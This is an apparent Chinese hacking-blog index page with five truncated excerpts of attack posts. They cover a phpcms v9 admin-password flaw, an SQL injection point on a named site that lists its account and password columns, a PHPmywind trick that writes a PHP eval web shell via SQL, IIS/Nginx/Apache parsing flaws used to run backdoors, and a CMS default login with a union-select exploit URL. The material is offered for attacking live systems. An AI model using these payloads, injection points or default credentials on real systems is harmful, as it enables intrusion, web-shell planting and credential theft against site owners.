-
phpcmsv9最新爆管理密码漏洞
漏洞形成原因就不多说了 文件在phpcms/api.php 有兴趣的盆友可以多去挖一挖phpcms的洞子主要利用过程:第一步:注册一个用户http://www.iick.blog/index.php?m=member&c=index...
-
博文非书资料管理系统SQL注射
注射点:http://www.hack990.com/asearch.do?status=showpage&LanguageType=1数据库:proone表段:ACCOUNT字段:ACCID,ACCNAME,PASSWORD,QQ...
-
PHPmywind 后台拿shell
网上好像有好多的教程的 用数据库执行Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');sel...
-
IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结
[+]IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg...
-
北京华盛网站管理系统漏洞
默认后台:admin/Login.asp默认密码:admin 123456exp:http://www.xxxxx.com/show_pt.asp?id=1568 and 1=2 union select 1,password,3,user...
